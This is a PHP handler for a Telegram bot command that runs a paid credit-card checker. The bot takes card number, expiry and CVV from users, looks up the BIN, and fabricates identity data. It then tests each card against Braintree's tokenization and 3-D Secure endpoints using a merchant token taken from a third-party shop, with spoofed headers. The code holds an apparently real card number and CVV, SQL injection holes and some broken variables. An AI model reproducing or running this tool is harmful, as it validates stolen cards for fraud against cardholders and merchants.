<?php
if(strpos($message, '!vbv') === 0 or strpos($message, '/vbv') === 0 or strpos($message, '.vbv') === 0){

$link = mysqli_connect("localhost", "root", "", "demo");

$sql = "SELECT role FROM persons WHERE userid='$gId'";
$result20 = mysqli_query($link, $sql);
$json_array = [];
while ($row = mysqli_fetch_assoc($result20)) {
  $json_array[] = $row;
}
$final201 = json_encode($json_array);
$role = trim(strip_tags(getStr($final201, '"role":"','"')));
mysqli_close($link);
if($role == 'USER'){
reply_to($chatId,$message_id,$keyboard,$nopre);
exit();
}elseif(empty($role)){
reply_to($chatId,$message_id,$keyboard,$noreg);
 exit();
}
sendaction($chatId, typing);
$lista = substr($message, 5);
$lista = clean($lista);
$check = strlen($lista);
$chem = substr($lista, 0,1);
$cc = multiexplode(array(":", "/", " ", "|", ""), $lista)[0];
$mes = multiexplode(array(":", "/", " ", "|", ""), $lista)[1];
$ano = multiexplode(array(":", "/", " ", "|", ""), $lista)[2];
$cvv = multiexplode(array(":", "/", " ", "|", ""), $lista)[3];
$strlenn = strlen($cc);
$list = preg_replace('/\s/', '|', $lista);
if (empty($lista)){
reply_to($chatId, $message_id,$keyboard,$validauth);
exit();
}elseif($check<15){
reply_to($chatId, $message_id,$keyboard,$validauth);
exit();
}elseif($chem == 1){
reply_to($chatId, $message_id,$keyboard,$validauth);
exit();
}elseif($chem == 2){ 
reply_to($chatId, $message_id,$keyboard,$validauth);
exit();
}elseif($chem == 7){
reply_to($chatId, $message_id,$keyboard,$validauth);
exit();
}elseif($chem == 8){ 
reply_to($chatId, $message_id,$keyboard,$validauth);
exit();
}elseif($chem == 9){
reply_to($chatId, $message_id,$keyboard,$validauth);
exit();
}elseif($chem == 0){ 
reply_to($chatId, $message_id,$keyboard,$validauth);
exit();
}elseif(strlen($strlenn != 16)){
reply_to($chatId, $message_id,$keyboard,$validauth);
exit();
}

$link = mysqli_connect("localhost", "root", "", "demo");
$sql = "SELECT credits FROM persons WHERE userid='$gId'";
$result = mysqli_query($link, $sql);

$json_array = [];


while ($row = mysqli_fetch_assoc($result)) {
  $json_array[] = $row;
}

$final2 = json_encode($json_array);

$client = trim(strip_tags(getStr($final2, '"credits":"','"')));
mysqli_close($link);

if($client < 5)
{
 reply_to($chatId, $message_id,$keyboard,$nocredits);
 exit();
}elseif(empty($client)){
 reply_to($chatId, $message_id,$keyboard,$noregister);
 exit();
}
$link = mysqli_connect("localhost", "root", "", "demo");
      $sql = "SELECT time FROM persons WHERE userid='$gId'";
$result20 = mysqli_query($link, $sql);
$json_array = [];
while ($row = mysqli_fetch_assoc($result20)) {
  $json_array[] = $row;
}
$final20 = json_encode($json_array);
$times = trim(strip_tags(getStr($final20, '"time":"','"')));
mysqli_close($link);

$link = mysqli_connect("localhost", "root", "", "demo");

$sql = "SELECT role FROM persons WHERE userid='$gId'";
$result20 = mysqli_query($link, $sql);
$json_array = [];
while ($row = mysqli_fetch_assoc($result20)) {
  $json_array[] = $row;
}
$final201 = json_encode($json_array);
$role = trim(strip_tags(getStr($final201, '"role":"','"')));
mysqli_close($link);

$current = time();
$sec = $current - $times;
if($role == 'MEMBER' and $sec < 20)
{
 $after = 20 - $sec;
  $antispam = urlencode ("<b>[ANTISPAM] <u> TRY AGAIN AFTER $after sec.</u></b>");
reply_to($chatId,$message_id,$keyboard,$antispam);
 exit();
}
$sss = reply_to($chatId,$message_id,$keyboard,"<b>□□□□□ 0%</b>");
   $respon = json_decode($sss, TRUE);
            $message_id_1 = $respon['result']['message_id'];
if ($_SERVER['REQUEST_METHOD'] == "POST"){
extract($_POST);
}
elseif ($_SERVER['REQUEST_METHOD'] == "GET"){
extract($_GET);
}
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
sendaction($chatId, typing);
$get = file_get_contents('https://randomuser.me/api/1.2/?nat=US');
preg_match_all("(\"first\":\"(.*)\")siU", $get, $matches1);
$first = $matches1[1][0];
preg_match_all("(\"last\":\"(.*)\")siU", $get, $matches1);
$last = $matches1[1][0];
preg_match_all("(\"email\":\"(.*)\")siU", $get, $matches1);
$email = $matches1[1][0];
preg_match_all("(\"street\":\"(.*)\")siU", $get, $matches1);
$street = $matches1[1][0];
preg_match_all("(\"city\":\"(.*)\")siU", $get, $matches1);
$city = $matches1[1][0];
preg_match_all("(\"state\":\"(.*)\")siU", $get, $matches1);
$state = $matches1[1][0];
$state1 = $matches1[1][0];
preg_match_all("(\"phone\":\"(.*)\")siU", $get, $matches1);
$phone = $matches1[1][0];
preg_match_all("(\"postcode\":(.*),\")siU", $get, $matches1);
$zip = $matches1[1][0];
preg_match_all("(\"username\":\"(.*)\")siU", $get, $matches1);
$usrnme = $matches1[1][0];
preg_match_all("(\"password\":\"(.*)\")siU", $get, $matches1);
$pass = $matches1[1][0];
preg_match_all("(\"salt\":\"(.*)\")siU", $get, $matches1);
$salt = $matches1[1][0];
$pwd = ''.$pass.''.$salt.'';
preg_match_all("(\"nat\":\"(.*)\")siU", $get, $matches1);
$con = $matches1[1][0];
$numero1 = substr($phone, 1,3);
$numero2 = substr($phone, 6,3);
$numero3 = substr($phone, 10,4);
$phone = $numero1.''.$numero2.''.$numero3;
$serve_arr = array("gmail.com","hotmail.com","yahoo.com","yopmail.com","outlook.com");
$serv_rnd = $serve_arr[array_rand($serve_arr)];
$email = str_replace("example.com", $serv_rnd, $email);
$state = state($state);
$bin = substr($cc,0,6);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://bins.su/');
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_POST, 1);
$headers = array();
$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
$headers[] = 'Accept-Language: en-US,en;q=0.9';
$headers[] = 'Cache-Control: max-age=0';
$headers[] = 'Connection: keep-alive';
$headers[] = 'Content-Type: application/x-www-form-urlencoded';
$headers[] = 'Host: bins.su';
$headers[] = 'Origin: http://bins.su';
$headers[] = 'Referer: http://bins.su/';
$headers[] = 'Upgrade-Insecure-Requests: 1';
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,15);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'action=searchbins&bins='.$bin.'&bank=&country=');
$result = curl_exec($ch);
$bincap1 = trim(strip_tags(getStr($result, '<td>Bank</td></tr><tr><td>','</td>')));
$bincap2 = trim(strip_tags(getStr($result, '<td>'.$bincap1.'</td><td>','</td>')));
$bincap3 = trim(strip_tags(getStr($result, '<td>'.$bincap2.'</td><td>','</td>')));
$bincap4 = trim(strip_tags(getStr($result, '<td>'.$bincap3.'</td><td>','</td>')));
$bincap5 = trim(strip_tags(getStr($result, '<td>'.$bincap4.'</td><td>','</td>')));
$roldex = trim(strip_tags(getStr($result, '<td>'.$bincap5.'</td><td>','</td>')));
curl_close($ch);
$flag = getFlags($bincap2);
if (empty($bincap1)){
$bincap1 = "N.A";
}
if (empty($bincap2)){
$bincap2 = "N.A";
}
if (empty($bincap3)){
$bincap3 = "N.A";
}
if (empty($bincap4)){
$bincap4 = "N.A";
}
if (empty($bincap5)){
$bincap5 = "N.A";
}
if (empty($roldex)){
$roldex = "N.A";
}
edit_message($chatId,$message_id_1,$keyboard,"<b>■□□□□ 20%</b>");


/////// CHECKING SK KEY [PK_LIVE] REQUEST ///////
// $start = microtime();
// $ch = curl_init();
// curl_setopt($ch, CURLOPT_URL, 'https://www.printerpix.com/cart/api/initializeBraintree');
// curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
// curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
// curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
// curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
// curl_setopt($ch, CURLOPT_HTTPHEADER, array(
// "www.printerpix.com",
// "User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; ONEPLUS A5010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.91 Mobile Safari/537.36",
// "Content-Type: application/json",
// "Accept: application/json, text/plain, */*",
// "Sec-Fetch-Site: cross-site",
// "Sec-Fetch-Mode: cors",
// "Sec-Fetch-Dest: empty",
// "Referer: https://www.printerpix.com/cart/payment",
// "Accept-Language: en-GB,en-US;q=0.9,en;q=0.8",
// ));
 // $curl1 = curl_exec($ch);
 // $token1 = trim(strip_tags(getStr($curl1,'data":"','"')));
 // $dec = base64_decode($token1);
 // $bearer = trim(strip_tags(getStr($dec,'authorizationFingerprint":"','"')));
// sendMessage($chatId,$keyboard,$bearer);

///////////====[1 request]====///////////////////////////////////
$bearer = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiIsImtpZCI6IjIwMTgwNDI2MTYtcHJvZHVjdGlvbiIsImlzcyI6Imh0dHBzOi8vYXBpLmJyYWludHJlZWdhdGV3YXkuY29tIn0.eyJleHAiOjE2MjgzMDQxMTEsImp0aSI6ImRlNzRkZjVhLTc4N2EtNGI3ZC1hNTY0LTRhZDUwZTE4OGY2ZiIsInN1YiI6Ijg1a2h4eWJ4cW5xdm16ZmciLCJpc3MiOiJodHRwczovL2FwaS5icmFpbnRyZWVnYXRld2F5LmNvbSIsIm1lcmNoYW50Ijp7InB1YmxpY19pZCI6Ijg1a2h4eWJ4cW5xdm16ZmciLCJ2ZXJpZnlfY2FyZF9ieV9kZWZhdWx0IjpmYWxzZX0sInJpZ2h0cyI6WyJtYW5hZ2VfdmF1bHQiXSwic2NvcGUiOlsiQnJhaW50cmVlOlZhdWx0Il0sIm9wdGlvbnMiOnt9fQ.iWW017-XWO87A-9wfIHcB4h__Cm2zgFwwuihdsSiFpfBSSRSHICuCX8iKwthxkDNrPRwb3ghqizhVX1apNMKzQ';
// sendMessage($chatId,$keyboard,$bearer);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://payments.braintree-api.com/graphql');
curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"Host: payments.braintree-api.com",
 'Authorization: Bearer '.$bearer.'',
"user-agent: Mozilla/5.0 (Windows NT '.rand(11,99).'.0; Win64; x64) AppleWebKit/'.rand(111,999).'.'.rand(11,99).' (KHTML, like Gecko) Chrome/'.rand(11,99).'.0.'.rand(1111,9999).'.'.rand(111,999).' Safari/'.rand(111,999).'.'.rand(11,99).''))",
"Braintree-Version: 2018-05-10",
"Content-Type: application/json",
"Accept: */*",
"Origin: https://follygraph.shoplo.com",
"Sec-Fetch-Site: cross-site",
"Sec-Fetch-Mode: cors",
"Sec-Fetch-Dest: empty",
"Referer: https://follygraph.shoplo.com/",
"Accept-Language: en-GB,en-US;q=0.9,en;q=0.8",
));
curl_setopt($ch, CURLOPT_POSTFIELDS, '{"clientSdkMetadata":{"source":"client","integration":"custom","sessionId":"edafd65b-ca99-48f0-8d44-673c8c54381c"},"query":"query ClientConfiguration {   clientConfiguration {     analyticsUrl     environment     merchantId     assetsUrl     clientApiUrl     creditCard {       supportedCardBrands       challenges       threeDSecureEnabled       threeDSecure {         cardinalAuthenticationJWT       }     }     applePayWeb {       countryCode       currencyCode       merchantIdentifier       supportedCardBrands     }     googlePay {       displayName       supportedCardBrands       environment       googleAuthorization       paypalClientId     }     ideal {       routeId       assetsUrl     }     kount {       merchantId     }     masterpass {       merchantCheckoutId       supportedCardBrands     }     paypal {       displayName       clientId       privacyUrl       userAgreementUrl       assetsUrl       environment       environmentNoNetwork       unvettedMerchant       braintreeClientId       billingAgreementsEnabled       merchantAccountId       currencyCode       payeeEmail     }     unionPay {       merchantAccountId     }     usBankAccount {       routeId       plaidPublicKey     }     venmo {       merchantId       accessToken       environment     }     visaCheckout {       apiKey       externalClientId       supportedCardBrands     }     braintreeApi {       accessToken       url     }     supportedFeatures   } }","operationName":"ClientConfiguration"}');

 $curl = curl_exec($ch);
  $mid = trim(strip_tags(getStr($curl,'"merchantId":"','",')));
sendMessage($chatId,$keyboard,$id);


$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://payments.braintree-api.com/graphql');
curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"Host: payments.braintree-api.com",
 'Authorization: Bearer '.$bearer.'',
"user-agent: Mozilla/5.0 (Windows NT '.rand(11,99).'.0; Win64; x64) AppleWebKit/'.rand(111,999).'.'.rand(11,99).' (KHTML, like Gecko) Chrome/'.rand(11,99).'.0.'.rand(1111,9999).'.'.rand(111,999).' Safari/'.rand(111,999).'.'.rand(11,99).''))",
"Braintree-Version: 2018-05-10",
"Content-Type: application/json",
"Accept: */*",
"Origin: https://assets.braintreegateway.com",
"Sec-Fetch-Site: cross-site",
"Sec-Fetch-Mode: cors",
"Sec-Fetch-Dest: empty",
"Referer: https://assets.braintreegateway.com",
"Accept-Language: en-GB,en-US;q=0.9,en;q=0.8",
));
curl_setopt($ch, CURLOPT_POSTFIELDS, '{"clientSdkMetadata":{"source":"client","integration":"custom","sessionId":"edafd65b-ca99-48f0-8d44-673c8c54381c"},"query":"mutation TokenizeCreditCard($input: TokenizeCreditCardInput!) {   tokenizeCreditCard(input: $input) {     token     creditCard {       bin       brandCode       last4       expirationMonth      expirationYear      binData {         prepaid         healthcare         debit         durbinRegulated         commercial         payroll         issuingBank         countryOfIssuance         productId       }     }   } }","variables":{"input":{"creditCard":{"number":"5338140456659693","expirationMonth":"01","expirationYear":"2022","cvv":"449"},"options":{"validate":false}}},"operationName":"TokenizeCreditCard');
 $curl = curl_exec($ch);
 $token = trim(strip_tags(getStr($curl,'token":"','"')));
sendMessage($chatId,$keyboard,$bin);
sendMessage($chatId,$keyboard,$token);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://api.braintreegateway.com/merchants/85khxybxqnqvmzfg/client_api/v1/payment_methods/tokencc_bh_sjgf84_jb5yt3_2x9pfg_zqxdnf_73y/three_d_secure/lookup');
curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Host: api.braintreegateway.com',
'User-Agent: Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.101 Mobile DuckDuckGo/5 Safari/537.36',
'Content-Type: application/json',
'Accept: */*',
'Origin: https://follygraph.shoplo.com',
'X-Requested-With: com.duckduckgo.mobile.android',
'Sec-Fetch-Site: cross-site',
'Sec-Fetch-Mode: cors',
'Sec-Fetch-Dest: empty',
'Referer: https://follygraph.shoplo.com/',
'Accept-Language: en-IN,en-US;q=0.9,en;q=0.8',
));
curl_setopt($ch, CURLOPT_POSTFIELDS, '{"amount":"13.99","additionalInfo":{},"bin":"533814","dfReferenceId":"0_46ebd605-cab1-405c-afd2-c76d8fff9362","clientMetadata":{"requestedThreeDSecureVersion":"2","sdkVersion":"web/3.64.2","cardinalDeviceDataCollectionTimeElapsed":1606,"issuerDeviceDataCollectionTimeElapsed":1175,"issuerDeviceDataCollectionResult":true},"authorizationFingerprint":"eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiIsImtpZCI6IjIwMTgwNDI2MTYtcHJvZHVjdGlvbiIsImlzcyI6Imh0dHBzOi8vYXBpLmJyYWludHJlZWdhdGV3YXkuY29tIn0.eyJleHAiOjE2MjgzMDQxMTEsImp0aSI6ImRlNzRkZjVhLTc4N2EtNGI3ZC1hNTY0LTRhZDUwZTE4OGY2ZiIsInN1YiI6Ijg1a2h4eWJ4cW5xdm16ZmciLCJpc3MiOiJodHRwczovL2FwaS5icmFpbnRyZWVnYXRld2F5LmNvbSIsIm1lcmNoYW50Ijp7InB1YmxpY19pZCI6Ijg1a2h4eWJ4cW5xdm16ZmciLCJ2ZXJpZnlfY2FyZF9ieV9kZWZhdWx0IjpmYWxzZX0sInJpZ2h0cyI6WyJtYW5hZ2VfdmF1bHQiXSwic2NvcGUiOlsiQnJhaW50cmVlOlZhdWx0Il0sIm9wdGlvbnMiOnt9fQ.iWW017-XWO87A-9wfIHcB4h__Cm2zgFwwuihdsSiFpfBSSRSHICuCX8iKwthxkDNrPRwb3ghqizhVX1apNMKzQ","braintreeLibraryVersion":"braintree/web/3.64.2","_meta":{"merchantAppId":"follygraph.shoplo.com","platform":"web","sdkVersion":"3.64.2","source":"client","integration":"custom","integrationType":"custom","sessionId":"edafd65b-ca99-48f0-8d44-673c8c54381c"}}');
 $curl1 = curl_exec($ch);
 $result = curl_exec($ch);

// eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiIsImtpZCI6IjIwMTgwNDI2MTYtcHJvZHVjdGlvbiIsImlzcyI6Imh0dHBzOi8vYXBpLmJyYWludHJlZWdhdGV3YXkuY29tIn0.eyJleHAiOjE2Mjc0ODIyNTMsImp0aSI6IjhjYzg5NGFmLTdlNGItNDQzNi04ZjQ0LTY0NmM2OGEyYzRkNSIsInN1YiI6IjhrcDZ5N2N2cXdoOHlkNGYiLCJpc3MiOiJodHRwczovL2FwaS5icmFpbnRyZWVnYXRld2F5LmNvbSIsIm1lcmNoYW50Ijp7InB1YmxpY19pZCI6IjhrcDZ5N2N2cXdoOHlkNGYiLCJ2ZXJpZnlfY2FyZF9ieV9kZWZhdWx0IjpmYWxzZX0sInJpZ2h0cyI6WyJtYW5hZ2VfdmF1bHQiXSwic2NvcGUiOlsiQnJhaW50cmVlOlZhdWx0Il0sIm9wdGlvbnMiOnsibWVyY2hhbnRfYWNjb3VudF9pZCI6ImxvZ29wb255b3VVU0QifX0.QuMRwf5hbJLJ8aeTaeDPwsYUF065Fc9xbaqYxFgBpECR5cUtHP_ocb3mt7LoXi1I8ezYl2I8_Qj0Yjs56p2O2w
$info = curl_getinfo($ch);
$timen = $info['total_time'];
$httpCode = $info['http_code'];
$timen = substr($timen, 0, 4);
curl_close($ch);

  edit_message($chatId,$message_id_1,$keyboard,"<b>■■■■□ 80%</b>");
// 
sendMessage($chatId,$keyboard,$result);
sendMessage($chatId,$keyboard,$curl1);
sendaction($chatId, typing);



//////////////////////////////////////////////////////////////////////////////////////////////////////////////

  edit_message($chatId,$message_id_1,$keyboard,"<b>■■■■■ 100%</b>");


$link = mysqli_connect("localhost", "root", "", "demo");
$sql = "SELECT credits FROM persons WHERE userid='$gId'";
$result = mysqli_query($link, $sql);

$json_array = [];


while ($row = mysqli_fetch_assoc($result)) {
  $json_array[] = $row;
}

$final2 = json_encode($json_array);

$client = trim(strip_tags(getStr($final2, '"credits":"','"')));
mysqli_close($link);
$balance = $client - 5;
mysqli_close($link); 

$link = mysqli_connect("localhost", "root", "", "demo");
$sql = "UPDATE persons SET credits = '$balance' WHERE persons.userid='$gId'";
$result = mysqli_query($link, $sql);
mysqli_close($link);

$result = urlencode("<b>
GATE --> STRIPE - AUTH
CC ->> <code>$cc|$mes|$ano|$cvv|@RolexVerse</code>
Result ->> $status
Message ->> $msg
AVSP ->> $avsp || AVSS ->> $avss
Code ->> $code
Bin Info ->> $bincap4-$bincap3-$bincap5
Bank Info ->> $roldex-$bincap2$flag
Time ->> ${timen}sec
Checked By ->> @$username
Credit Left ->> ${balance}💰
Bot By --> @RolexVerse</b>");
edit_message($chatId,$message_id_1,$keyboard, $result);
// sendMessage1($result);
rest($lista);
        $timest = time(); 

$link = mysqli_connect("localhost", "root", "", "demo");
$sql = "UPDATE persons SET time = '$timest' WHERE persons.userid='$gId'";
$result21 = mysqli_query($link, $sql);
mysqli_close($link);
exit();
// sendMessage($chatId,$keyboard,$ip1);
}
?>